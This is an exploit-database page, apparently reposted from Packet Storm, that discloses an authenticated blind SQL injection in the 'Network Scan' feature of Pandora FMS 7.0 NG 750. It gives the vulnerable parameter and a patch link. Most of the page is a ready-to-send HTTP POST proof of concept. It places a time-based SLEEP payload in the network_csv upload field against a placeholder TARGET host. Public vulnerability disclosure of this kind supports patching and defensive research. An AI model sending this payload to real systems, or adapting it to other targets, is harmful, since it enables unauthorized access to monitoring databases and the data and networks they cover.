Lucene search
Pandora FMS 7.0 NG 750 SQL Injection
🗓️ 22 Dec 2020 00:00:00Reported by Matthew AbereggType 
packetstorm🔗 packetstormsecurity.com👁 416 Views
Pandora FMS 7.0 NG 750 SQL Injection in Network Sca
Show more
`# Exploit Title: Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)
# Date: 12-21-2020
# Exploit Author: Matthew Aberegg, Alex Prieto
# Vendor Homepage: https://pandorafms.com/
# Patch Link: https://github.com/pandorafms/pandorafms/commit/d08e60f13a858fbd22ce6b83fa8ca391c608ec5c
# Software Link: https://pandorafms.com/community/get-started/
# Version: Pandora FMS 7.0 NG 750
# Tested on: Ubuntu 18.04
# Vulnerability Details
# Description : A blind SQL injection vulnerability exists in the "Network Scan" functionality of Pandora FMS.
# Vulnerable Parameter : network_csv
# POC
POST /pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan&page=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------308827614039434535382911921119
Content-Length: 1597
Origin: http://TARGET
Connection: close
Referer: http://TARGET/pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
Upgrade-Insecure-Requests: 1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_manual_defined"
1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_select"
300
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_text"
0
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval"
0
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_units"
1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="taskname"
test
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="id_recon_server"
3
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network_csv_enabled"
on
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network_csv"; filename="test.txt"
Content-Type: text/plain
' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- a
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network"
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="comment"
test
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="submit"
Next
-----------------------------308827614039434535382911921119--
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo22 Dec 2020 00:00Current
0.6Low risk
Vulners AI Score0.6